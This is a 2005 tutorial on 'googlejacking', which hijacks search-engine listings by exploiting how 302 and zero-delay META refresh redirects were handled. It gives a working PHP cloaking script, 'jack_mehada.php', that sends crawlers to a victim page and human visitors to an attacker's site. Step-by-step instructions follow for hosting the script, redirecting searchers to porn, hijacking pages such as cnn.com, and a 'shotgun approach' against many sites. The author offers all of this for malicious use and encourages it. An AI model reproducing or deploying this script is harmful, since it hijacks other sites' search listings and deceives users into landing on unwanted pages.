Googlejacking By Example

Copyright (c)  2005  J V., http://www.iswapyou.com/blog/ and http://www.thepopeisevil.com
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.2
or any later version published by the Free Software Foundation;
with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts.
A copy of the license is included in the section entitled "GNU
Free Documentation License".

INTRODUCTION
============

Lots of noise on the 'net lately about this new phenomenom called "Googlejacking".  For those of you who have spent the last month or so in a cave, googlejacking is when a a website in google's listing is linked in the google database to a site that is NOT on the domain of the original writer of the original page.  For instance, you could have a situation where a page listed in googles database, say http://www.cnn.com, is linked on a google search page to http://www.thepopeisevil.com/cnn/, or even http://www.hornygirls.porn-host.org/cnn/.  The original website description and title will be the same, only the link will be different in the google database, so when a user clicks on the searched link it will go through the off-cnn page, not the original cnn page.

Danger, Will Robinson.

How does this happen?  The problem is with the way google handles 302 redirects and META refresh's with a zero wait time.  
In other words google tries to make it so pages with the "same" content are not in its database.  A 302 redirect or a META refresh with zero wait time will redirect the browser to another page, so google does not want to index both the redirect page and the page you are redirected to.  The zero wait time for a meta refresh IS important, because otherwise googlebot will index the redirect page as a page with no content (a blank page) instead of a page that is identical to our target page.  Confused?  Hopefully when we look at the exploit code it'll all be crystal clear.  

This problem isn't restricted to google.  MSN Search is also reported to have this vulnerability, and theoretically any other search engines will have the same problem if they handle 302 and meta redirects the same as google does. 


EXPLOIT LISTING AND DISCUSSION
==============================

Theres a lot of other good information already out there (see references at bottom of article), but what I couldnt find was some good code exploiting the vulnerability.  I hope to remedy this with "jack_mehada.php", shown below.


<!--BEGIN HTML/PHP CODE LISTING - "jack_mehada.php"-->

<HTML>
<HEAD>
<?php
$target_url = $_GET['url'];

   if( strstr($HTTP_USER_AGENT, 'Googlebot') || strstr($HTTP_USER_AGENT, 'msnbot') || strstr($HTTP_USER_AGENT, 'Slurp')
	|| strstr($HTTP_USER_AGENT, 'grub') || strstr($HTTP_USER_AGENT, 'Ask Jeeves') || strstr($HTTP_USER_AGENT, 'Wget') )
	echo "<meta http-equiv=\"refresh\" content=\"0;url=http://$target_url\">";

   else
	echo "<meta http-equiv=\"refresh\" content=\"0;url=http://www.thepopeisevil.com\">";
?>
</HEAD>

<BODY>
<!-- "jack_mehada.php" by J and Evil Pope of http://www.thepopeisevil.com -->
</BODY>

</HTML>

<!--END HTML/PHP CODE LISTING - "jack_mehada.php"-->


If you know a little about php and a little about browsers what this script does should not take long to understand.  The if statement checks if the software that requested the page is a bot by checking its user-agent string.  I didn't just check for googlebot - msnbot and a few others are in there.  Bots get a redirect to our target page, everyone else gets a redirect to http://www.thepopeisevil.com.  


YOU CAN CHANGE THE SCRIPT TO REDIRECT NON BOTS TO ANY PAGE YOU WANT BY CHANGING THE LINE:
echo "<meta http-equiv=\"refresh\" content=\"0;url=http://www.thepopeisevil.com\">";

TO:
echo "<meta http-equiv=\"refresh\" content=\"0;url=http://www.my-site.com/whateverpageyouwant.html\">";

So if I wanted to redirect it to my favorite porn gallery ever (haha, pure anarchist evil :P ),  I'd change the line to:
echo "<meta http-equiv=\"refresh\" content=\"0;url=http://hornygirls.porn-host.org\">";


Save and upload this script to your web host, naming it jack_mehada.php.  Once the script is up on your web host, assuming your host supports php you can jack ANY page you want by linking the script on an existing web page.  I'd do it like this if i wanted to jack cnn.com:
<a href="http://www.my-website.com/jack_mehada.php?url=www.cnn.com">My Jacker Link</a>

Or like this if I wanted to jack a friends geocities page:
<a href="http://www.my-website.com/jack_mehada.php?url=www.geocities.com/member696969/my_lame_page.html">Jack-o-lantern</a>

When google rolls around and indexes the page with these links on it, it should also schedule the jacker pages for indexing.  YAY!


TIPS AND TRICKS
===============

If you want to have the best chance of your jacked page being listed instead of the original, you need to work around google's PageRank algorithm.  The PageRank algorithm is google's method for checking the "quality" of a site, and is out of the scope of this article, but check the references below if you want to know more, or look it up on wikipedia.com.  Trying to get a better PageRank is NOT necessary however, since obviously lower PageRanked pages have jacked higher PageRanked pages many, many times- it just helps.

And of course, for best results try the shotgun approach.  Jack lots of pages using lots of links, and if you know php, edit the script and get creative.

How do you know if you've successfully jacked a page?  Search for the page you're trying to jack in google.  If the green url under the description is your jacker url instead of the original page url, you win.  Game over man.

Email me at evilpope@thepopeisevil.com if you have questions or figure out something creative to do with/put in to the script.  Also email me if you successfully jack something, so we can share a laugh.  Flames will of course be forwarded to /dev/null.

Enjoy, and happy jacking!


REFERENCES
==========

http://clsc.net/research/google-302-page-hijack.htm - "Page Hijack Exploit - 302, redirects and google"
http://en.wikipedia.org/wiki/Pagerank - Article on PageRank on wikipedia